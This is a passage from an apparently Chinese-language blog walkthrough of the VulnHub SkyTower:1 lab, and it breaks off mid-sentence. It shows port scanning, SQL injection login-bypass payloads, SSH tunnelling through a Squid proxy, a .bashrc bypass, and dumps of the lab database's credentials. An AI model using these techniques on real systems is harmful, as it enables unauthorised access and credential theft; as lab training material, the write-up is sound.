{"id":371,"date":"2024-02-21T16:09:53","date_gmt":"2024-02-21T08:09:53","guid":{"rendered":"http:\/\/162.14.82.114\/?p=371"},"modified":"2024-02-21T16:09:53","modified_gmt":"2024-02-21T08:09:53","slug":"vulnhub-skytower1","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/371\/02\/21\/2024\/","title":{"rendered":"Vulnhub&#8211;SKYTOWER:1"},"content":{"rendered":"<h1>SKYTOWER: 1<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402211608778.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402211608778.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240221124421244\" \/><\/div><\/p>\n<p>\u6253\u5f00\u9776\u673a\uff0c\u8bbe\u4e3aNAT\u6a21\u5f0f\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402211608780.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402211608780.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240221130142822\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u626b\u4e00\u4e0b\uff0c\u6ca1\u626b\u51fa\u6765\uff1a<\/p>\n<h2>\u751f\u6210\u9776\u573a<\/h2>\n<p>\u7528vmware\u6253\u5f00\u8bd5\u8bd5\uff0c\u5148\u8981\u8f6c\u6362\u6210vmware\uff1a<\/p>\n<pre><code class=\"language-shell\">VBoxManage.exe clonehd E:\\vulnhub\\SkyTower\\SkyTower.vdi E:\\vulnhub\\SkyTower\\SkyTower.vmdk --format VMDK\n# 0%...10%...20%...30%...40%...50%...60%...70%...80%...90%...100%\n# Clone medium created in format &#039;VMDK&#039;. UUID: 4d5df452-91cd-4267-923b-a959df93aed4\nvmware-vdiskmanager.exe -r &quot;E:\\vulnhub\\SkyTower\\SkyTower.vmdk&quot; -t 0 &quot;E:\\vulnhub\\SkyTower\\SkyTower1.vmdk&quot;\n# Creating disk &#039;E:\\vulnhub\\SkyTower\\SkyTower1.vmdk&#039;\n#   Convert: 100% done.\n# Virtual disk conversion successful.<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402211608781.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402211608781.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240221140755790\" \/><\/div><\/p>\n<p>\u626b\u5230\u4e86\uff0c\u8bbf\u95ee\u770b\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402211608782.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402211608782.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240221140938605\" \/><\/div><\/p>\n<p>\u53ef\u4ee5\u6b63\u5e38\u8bbf\u95ee\u5230\uff0c\u4e0b\u9762\u5f00\u59cb\u8fdb\u884c\u516c\u9e21\ud83d\udc13\u3002<\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">nmap -sV -sT -T4 -p- 192.168.244.129<\/code><\/pre>\n<pre><code class=\"language-text\">Starting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-02-21 01:12 EST\nNmap scan report for 192.168.244.129\nHost is up (0.0020s latency).\nNot shown: 65532 closed tcp ports (conn-refused)\nPORT     STATE    SERVICE    VERSION\n22\/tcp   filtered ssh\n80\/tcp   open     http       Apache httpd 2.2.22 ((Debian))\n3128\/tcp open     http-proxy Squid http proxy 3.1.20\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 28.13 seconds<\/code><\/pre>\n<h3>\u76ee\u5f55\u626b\u63cf<\/h3>\n<pre><code class=\"language-shell\"># feroxbuster -u http:\/\/192.168.244.129\ndirb http:\/\/192.168.244.129<\/code><\/pre>\n<pre><code class=\"language-text\">---- Scanning URL: http:\/\/192.168.244.129\/ ----\n+ http:\/\/192.168.244.129\/background (CODE:200|SIZE:2572609)                                                   \n+ http:\/\/192.168.244.129\/cgi-bin\/ (CODE:403|SIZE:291)                                                         \n+ http:\/\/192.168.244.129\/index (CODE:200|SIZE:1136)                                                           \n+ http:\/\/192.168.244.129\/index.html (CODE:200|SIZE:1136)                                                      \n+ http:\/\/192.168.244.129\/server-status (CODE:403|SIZE:296)      <\/code><\/pre>\n<h3>wappalyzer<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402211608783.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402211608783.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240221142116948\" style=\"zoom:33%;\" \/><\/div><\/p>\n<h3>\u4e07\u80fd\u5bc6\u7801<\/h3>\n<pre><code class=\"language-sql\">1&#039; or &#039;1&#039;=&#039;1\n# Login Failed\n1&#039; or 1=1 --\n# There was an error running the query [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near &#039;11 &#039; and password=&#039;passwd&#039;&#039; at line 1]<\/code><\/pre>\n<p>\u6709\u9519\u8bef\u56de\u663e\uff0c\u53ef\u4ee5\u5c1d\u8bd5\u5229\u7528\uff01<\/p>\n<h2>\u6f0f\u6d1e\u5229\u7528<\/h2>\n<h3>sql\u6ce8\u5165<\/h3>\n<p>\u67e5\u770b\u62a5\u9519\uff0c\u53d1\u73b0\u79d8\u5bc6\u662f 11 \uff0c\u8bf4\u660e\u8fdb\u884c\u4e86\u8fc7\u6ee4\uff0c\u5c1d\u8bd5\u65b0\u7684payload\uff1a<\/p>\n<pre><code class=\"language-sql\">&#039;||1=1#\n&#039;&amp;1=1#<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402211608784.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402211608784.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240221143334433\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>nice\uff01\u8fdb\u6765\u4e86\uff01<\/p>\n<pre><code class=\"language-text\">Username: john\nPassword: hereisjohn <\/code><\/pre>\n<p>\u5c1d\u8bd5\u4f7f\u7528\u8fd9\u4e2a\u51ed\u8bc1\uff0cssh\u767b\u5f55\u4e00\u4e0b\uff0c\u770b\u770b\u884c\u4e0d\u884c\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402211608785.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402211608785.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240221143644785\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u4f3c\u4e4e\u8bbf\u95ee\u4e0d\u5230\uff0c\u88ab\u6211\u53d6\u6d88\u6389\u4e86\uff0c\u4e0a\u9762\u626b\u51fa\u4e00\u4e2a\u4ee3\u7406\u7aef\u53e3<code>squid<\/code>\uff0c\u731c\u6d4b\u9700\u8981\u8fdb\u884c\u4ee3\u7406\u8bbf\u95ee\uff1a<\/p>\n<pre><code class=\"language-shell\">proxytunnel -p 192.168.244.129:3128 -d 127.0.0.1:22 -a 1234\n# socat TCP-LISTEN:1234,reuseaddr,fork PROXY:192.168.244.129:127.0.0.1:22,proxyport=3128<\/code><\/pre>\n<p>\u5c1d\u8bd5\u8fdb\u884c\u8fde\u63a5\uff0c\u8fdb\u53bb\u4e86\u4f46\u662f\u4f1a\u88ab\u5f39\u51fa\u6765<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402211608786.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402211608786.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240221144528426\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<h2>\u6743\u9650\u63d0\u5347<\/h2>\n<p>\u53ef\u4ee5\u5c1d\u8bd5\u987a\u4fbf\u6267\u884c\u547d\u4ee4\uff0c\u67e5\u770b\u4e00\u4e0b\u767b\u5f55\u6587\u4ef6\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402211608787.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402211608787.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240221145052699\" \/><\/div><\/p>\n<p>\u6587\u4ef6\u5982\u4e0b\uff1a<\/p>\n<pre><code class=\"language-shell\"># ~\/.bashrc: executed by bash(1) for non-login shells.\n# see \/usr\/share\/doc\/bash\/examples\/startup-files (in the package bash-doc)\n# for examples\n\n# If not running interactively, don&#039;t do anything\ncase $- in\n    *i*) ;;\n      *) return;;\nesac\n\n# don&#039;t put duplicate lines or lines starting with space in the history.\n# See bash(1) for more options\nHISTCONTROL=ignoreboth\n\n# append to the history file, don&#039;t overwrite it\nshopt -s histappend\n\n# for setting history length see HISTSIZE and HISTFILESIZE in bash(1)\nHISTSIZE=1000\nHISTFILESIZE=2000\n\n# check the window size after each command and, if necessary,\n# update the values of LINES and COLUMNS.\nshopt -s checkwinsize\n\n# If set, the pattern &quot;**&quot; used in a pathname expansion context will\n# match all files and zero or more directories and subdirectories.\n#shopt -s globstar\n\n# make less more friendly for non-text input files, see lesspipe(1)\n#[ -x \/usr\/bin\/lesspipe ] &amp;&amp; eval &quot;$(SHELL=\/bin\/sh lesspipe)&quot;\n\n# set variable identifying the chroot you work in (used in the prompt below)\nif [ -z &quot;${debian_chroot:-}&quot; ] &amp;&amp; [ -r \/etc\/debian_chroot ]; then\n    debian_chroot=$(cat \/etc\/debian_chroot)\nfi\n\n# set a fancy prompt (non-color, unless we know we &quot;want&quot; color)\ncase &quot;$TERM&quot; in\n    xterm-color) color_prompt=yes;;\nesac\n\n# uncomment for a colored prompt, if the terminal has the capability; turned\n# off by default to not distract the user: the focus in a terminal window\n# should be on the output of commands, not on the prompt\n#force_color_prompt=yes\n\nif [ -n &quot;$force_color_prompt&quot; ]; then\n    if [ -x \/usr\/bin\/tput ] &amp;&amp; tput setaf 1 &gt;&amp;\/dev\/null; then\n        # We have color support; assume it&#039;s compliant with Ecma-48\n        # (ISO\/IEC-6429). (Lack of such support is extremely rare, and such\n        # a case would tend to support setf rather than setaf.)\n        color_prompt=yes\n    else\n        color_prompt=\n    fi\nfi\n\nif [ &quot;$color_prompt&quot; = yes ]; then\n    PS1=&#039;${debian_chroot:+($debian_chroot)}\\[\\033[01;32m\\]\\u@\\h\\[\\033[00m\\]:\\[\\033[01;34m\\]\\w\\[\\033[00m\\]\\$ &#039;\nelse\n    PS1=&#039;${debian_chroot:+($debian_chroot)}\\u@\\h:\\w\\$ &#039;\nfi\nunset color_prompt force_color_prompt\n\n# If this is an xterm set the title to user@host:dir\ncase &quot;$TERM&quot; in\nxterm*|rxvt*)\n    PS1=&quot;\\[\\e]0;${debian_chroot:+($debian_chroot)}\\u@\\h: \\w\\a\\]$PS1&quot;\n    ;;\n*)\n    ;;\nesac\n\n# enable color support of ls and also add handy aliases\nif [ -x \/usr\/bin\/dircolors ]; then\n    test -r ~\/.dircolors &amp;&amp; eval &quot;$(dircolors -b ~\/.dircolors)&quot; || eval &quot;$(dircolors -b)&quot;\n    alias ls=&#039;ls --color=auto&#039;\n    #alias dir=&#039;dir --color=auto&#039;\n    #alias vdir=&#039;vdir --color=auto&#039;\n\n    #alias grep=&#039;grep --color=auto&#039;\n    #alias fgrep=&#039;fgrep --color=auto&#039;\n    #alias egrep=&#039;egrep --color=auto&#039;\nfi\n\n# some more ls aliases\n#alias ll=&#039;ls -l&#039;\n#alias la=&#039;ls -A&#039;\n#alias l=&#039;ls -CF&#039;\n\n# Alias definitions.\n# You may want to put all your additions into a separate file like\n# ~\/.bash_aliases, instead of adding them here directly.\n# See \/usr\/share\/doc\/bash-doc\/examples in the bash-doc package.\n\nif [ -f ~\/.bash_aliases ]; then\n    . ~\/.bash_aliases\nfi\n\n# enable programmable completion features (you don&#039;t need to enable\n# this, if it&#039;s already enabled in \/etc\/bash.bashrc and \/etc\/profile\n# sources \/etc\/bash.bashrc).\nif ! shopt -oq posix; then\n  if [ -f \/usr\/share\/bash-completion\/bash_completion ]; then\n    . \/usr\/share\/bash-completion\/bash_completion\n  elif [ -f \/etc\/bash_completion ]; then\n    . \/etc\/bash_completion\n  fi\nfi\n\necho\necho  &quot;Funds have been withdrawn&quot;\nexit<\/code><\/pre>\n<p>\u4f7f\u7528<code>-C<\/code>\u547d\u4ee4\u5373\u53ef\u5728\u9a8c\u8bc1\u767b\u5f55\u4ee5\u540e\u8fdb\u884c\u547d\u4ee4\u6267\u884c\uff1a<\/p>\n<pre><code class=\"language-shell\">ssh john@127.0.0.1 -p 1234 -C bash<\/code><\/pre>\n<p>\u4e5f\u53ef\u4ee5\u5c1d\u8bd5\u5220\u9664<code>.bashrc<\/code>\u6587\u4ef6\u8fdb\u884c\u767b\u5f55\u3002<\/p>\n<p>\u67e5\u770b\u4e00\u4e0b\u662f\u5426\u5b58\u5728 <code>suid<\/code> \u6f0f\u6d1e\uff0c\u518d\u770b\u4e0b<code>sudo -l<\/code>\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402211608788.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402211608788.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240221145933120\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u6211\u8bb0\u5f97<code>sudoedit<\/code>\u4f3c\u4e4e\u53ef\u4ee5\u505a\u4e9b\u4e1c\u897f\uff0c\u6682\u65f6\u60f3\u4e0d\u8d77\u6765\u4e86\uff0c\u5c1d\u8bd5\u63d0\u5347shell\uff1a<\/p>\n<pre><code class=\"language-shell\">python -c &#039;import pty; pty.spawn(&quot;\/bin\/bash&quot;)&#039;<\/code><\/pre>\n<p>\u4f46\u662f\u663e\u793a\u6ca1\u6709\u68c0\u6d4b\u5230python\u547d\u4ee4\uff1a<\/p>\n<pre><code>2&lt;\/dev\/null find \/ | grep python<\/code><\/pre>\n<pre><code class=\"language-text\">\/usr\/lib\/python2.6\n\/usr\/lib\/python2.6\/dist-packages\n\/usr\/lib\/python2.6\/dist-packages\/debconf.py\n\/usr\/lib\/python3\n\/usr\/lib\/python3\/dist-packages\n\/usr\/lib\/python3\/dist-packages\/debconf.py\n\/usr\/lib\/python2.7\n\/usr\/lib\/python2.7\/dist-packages\n\/usr\/lib\/python2.7\/dist-packages\/debconf.py\n\/usr\/share\/nano\/python.nanorc<\/code><\/pre>\n<p>\u4f3c\u4e4e\u6ca1\u5b89\u88c5\u3002\u3002\u3002<\/p>\n<p>\u770b\u4e00\u4e0b\u6570\u636e\u5e93\u76f8\u5173\u6587\u4ef6\uff0c\u770b\u770b\u6709\u6ca1\u6709\u6536\u83b7\uff1a<\/p>\n<pre><code class=\"language-shell\">cd \/var\/www\nls\ncat login.php<\/code><\/pre>\n<pre><code class=\"language-text\">&lt;?php\n\n$db = new mysqli(&#039;localhost&#039;, &#039;root&#039;, &#039;root&#039;, &#039;SkyTech&#039;);\n\nif($db-&gt;connect_errno &gt; 0){\n    die(&#039;Unable to connect to database [&#039; . $db-&gt;connect_error . &#039;]&#039;);\n\n}\n\n$sqlinjection = array(&quot;SELECT&quot;, &quot;TRUE&quot;, &quot;FALSE&quot;, &quot;--&quot;,&quot;OR&quot;, &quot;=&quot;, &quot;,&quot;, &quot;AND&quot;, &quot;NOT&quot;);\n$email = str_ireplace($sqlinjection, &quot;&quot;, $_POST[&#039;email&#039;]);\n$password = str_ireplace($sqlinjection, &quot;&quot;, $_POST[&#039;password&#039;]);\n\n$sql= &quot;SELECT * FROM login where email=&#039;&quot;.$email.&quot;&#039; and password=&#039;&quot;.$password.&quot;&#039;;&quot;;\n$result = $db-&gt;query($sql);\n\nif(!$result)\n    die(&#039;There was an error running the query [&#039; . $db-&gt;error . &#039;]&#039;);\nif($result-&gt;num_rows==0)\n    die(&#039;&lt;br&gt;Login Failed&lt;\/br&gt;&#039;);\n\n$row = $result-&gt;fetch_assoc();\n\necho &quot;&lt;HTML&gt;&quot;;\necho &#039;\n      &lt;div style=&quot;height:100%; width:100%;background-image:url(\\&#039;background.jpg\\&#039;);\n                                background-size:100%;\n                                background-position:50% 50%;\n                                background-repeat:no-repeat;&quot;&gt;\n      &lt;div style=&quot;\n                  padding-right:8px;  \n                  padding-left:10px; \n                  padding-top: 10px;  \n                  padding-bottom: 10px;  \n                  background-color:white;     \n                  border-color: #000000;\n                  border-width: 5px;\n                  border-style: solid;\n                  width: 400px;\n                  height:430px;\n                  position:absolute;\n                  top:50%;\n                  left:50%;\n                  margin-top:-215px; \/* this is half the height of your div*\/  \n                  margin-left:-200px;\n                                &quot;&gt;\n        &#039;;\necho &quot;&lt;br&gt;&lt;strong&gt;&lt;font size=4&gt;Welcome &quot;.$row[&quot;email&quot;].&quot;&lt;\/font&gt;&lt;br \/&gt; &lt;\/br&gt;&lt;\/strong&gt;&quot;;\necho &quot;As you may know, SkyTech has ceased all international operations.&lt;br&gt;&lt;br&gt; To all our long term employees, we wish to convey our thanks for your dedication and hard work.&lt;br&gt;&lt;br&gt;&lt;strong&gt;Unfortunately, all international contracts, including yours have been terminated.&lt;\/strong&gt;&lt;br&gt;&lt;br&gt; The remainder of your contract and retirement fund, &lt;strong&gt;$2&lt;\/strong&gt; ,has been payed out in full to a secure account.  For security reasons, you must login to the SkyTech server via SSH to access the account details.&lt;br&gt;&lt;br&gt;&lt;strong&gt;Username: &quot;.explode(&quot;@&quot;,$row[&quot;email&quot;])[0].&quot;&lt;\/strong&gt;&lt;br&gt;&lt;strong&gt;Password: &quot;.$row[&quot;password&quot;].&quot;&lt;\/strong&gt;&quot;;\necho &quot; &lt;br&gt;&lt;br&gt; We wish you the best of luck in your future endeavors. &lt;br&gt; &lt;\/div&gt; &lt;\/div&gt;&quot;;\necho &quot;&lt;\/HTML&gt;&quot;\n\n?&gt;<\/code><\/pre>\n<p>\u767b\u5f55\u4e00\u4e0b\u6570\u636e\u5e93\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402211608789.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402211608789.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240221152222114\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u4f46\u662f\u62a5\u9519\uff0c\u6211\u5220\u9664<code>.bashrc<\/code>\u540e\u518d\u6b21\u8fdb\u884cssh\u8fde\u63a5\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402211608790.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402211608790.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240221152542384\" \/><\/div><\/p>\n<p>\u53ef\u4ee5\u8fde\u63a5\u5230\u6570\u636e\u5e93\u4e86\uff0c\u8fd9\u91cc\u4e3a\u5565\u4e0d\u884c\uff0c\u7b49\u4e0b\u518d\u5c1d\u8bd5\u4fee\u6539\u4e0b\uff0c\u5148\u67e5\u770b\u4e00\u4e0b\u6570\u636e\u5e93\uff1a<\/p>\n<pre><code class=\"language-shell\">mysql&gt; show databases;\n+--------------------+\n| Database           |\n+--------------------+\n| information_schema |\n| SkyTech            |\n| mysql              |\n| performance_schema |\n+--------------------+\n4 rows in set (0.00 sec)\n\nmysql&gt; use SkyTech;\nReading table information for completion of table and column names\nYou can turn off this feature to get a quicker startup with -A\n\nDatabase changed\nmysql&gt; show tables;\n+-------------------+\n| Tables_in_SkyTech |\n+-------------------+\n| login             |\n+-------------------+\n1 row in set (0.00 sec)\n\nmysql&gt; select * from login;\n+----+---------------------+--------------+\n| id | email               | password     |\n+----+---------------------+--------------+\n|  1 | john@skytech.com    | hereisjohn   |\n|  2 | sara@skytech.com    | ihatethisjob |\n|  3 | william@skytech.com | senseable    |\n+----+---------------------+--------------+\n3 rows in set (0.00 sec)<\/code><\/pre>\n<p>\u5c1d\u8bd5\u4f7f\u7528 ssh 